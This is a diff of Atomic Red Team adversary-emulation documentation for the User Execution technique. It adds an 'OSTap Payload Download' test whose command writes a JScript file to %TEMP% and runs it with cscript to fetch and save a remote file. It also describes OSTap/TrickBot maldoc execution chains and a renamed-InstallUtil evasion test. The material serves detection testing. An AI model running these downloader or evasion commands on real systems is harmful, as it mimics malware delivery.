@@ -563,7 +565,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #8 - InstallUtil evasive invocation
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly.
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
**Supported Platforms:** Windows
atomics/T1204/T1204.md
+43 -6
View File
@@ -10,9 +10,11 @@ While User Execution frequently occurs shortly after Initial Access it may occur
- [Atomic Test #1 - OSTap Style Macro Execution](#atomic-test-1---ostap-style-macro-execution)
- [Atomic Test #2 - Maldoc choice flags command execution](#atomic-test-2---maldoc-choice-flags-command-execution)
- [Atomic Test #2 - OSTap Payload Download](#atomic-test-2---ostap-payload-download)
- [Atomic Test #3 - OSTAP JS version](#atomic-test-3---ostap-js-version)
- [Atomic Test #3 - Maldoc choice flags command execution](#atomic-test-3---maldoc-choice-flags-command-execution)
- [Atomic Test #4 - OSTAP JS version](#atomic-test-4---ostap-js-version)
<br/>
@@ -21,7 +23,7 @@ While User Execution frequently occurs shortly after Initial Access it may occur
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
@@ -73,7 +75,42 @@ Stop-Process -Name WINWORD
<br/>
<br/>
## Atomic Test #2 - Maldoc choice flags command execution
## Atomic Test #2 - OSTap Payload Download
Uses cscript //E:jscript to download a file
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%&#92;OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```cmd
del #{script_file} /F /Q >nul 2>&1
```
<br/>
<br/>
## Atomic Test #3 - Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
@@ -123,8 +160,8 @@ Stop-Process -Name WINWORD
<br/>
<br/>
## Atomic Test #3 - OSTAP JS version
Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
## Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
**Supported Platforms:** Windows